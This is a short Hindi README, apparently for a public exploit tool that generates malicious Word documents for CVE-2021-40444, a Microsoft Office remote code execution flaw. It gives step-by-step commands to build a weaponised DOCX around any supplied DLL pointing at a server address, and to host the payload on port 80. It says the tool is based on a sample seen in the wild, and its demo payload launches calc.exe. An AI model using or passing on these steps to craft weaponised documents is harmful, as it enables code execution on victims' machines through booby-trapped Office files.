
CVE-2021-40444 (Microsoft Office RCE) का शोषण करने वाले दुर्भावनापूर्ण DOCX दस्तावेज़ उत्पन्न करता है, जिसमें DLL पेलोड वितरण के लिए होस्टेड सर्वर होता है, वास्तविक दुनिया के रिवर्स-इंजीनियर्ड नमूनों पर आधारित।
CVE-2021-40444 का शोषण करने के लिए दुर्भावनापूर्ण docx जनरेटर (Microsoft Office Word रिमोट कोड निष्पादन)
इस स्क्रिप्ट का निर्माण जंगली में उपयोग किए गए नमूने पर कुछ रिवर्स इंजीनियरिंग पर आधारित है: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx फ़ाइल)
आपको पहले lcab स्थापित करना होगा (sudo apt-get install lcab)
मैन्युअल पुनरुत्पादन चरणों के लिए REPRODUCE.md देखें
यदि आपका जनरेट किया गया cab काम नहीं कर रहा है, तो exploit.html URL को calc.cab की ओर इंगित करने का प्रयास करें
पहले एक DLL दिए गए एक दुर्भावनापूर्ण docx दस्तावेज़ उत्पन्न करें, आप test/calc.dll पर मौजूद का उपयोग कर सकते हैं जो system() कॉल से calc.exe को पॉप करता है
python3 exploit.py generate test/calc.dll http://<SRV IP>

एक बार जब आप दुर्भावनापूर्ण docx उत्पन्न कर लेते हैं (out/ पर होगा) तो आप सर्वर सेटअप कर सकते हैं:
sudo python3 exploit.py host 80

अंत में विंडोज़ वर्चुअल मशीन में docx आज़माएँ:
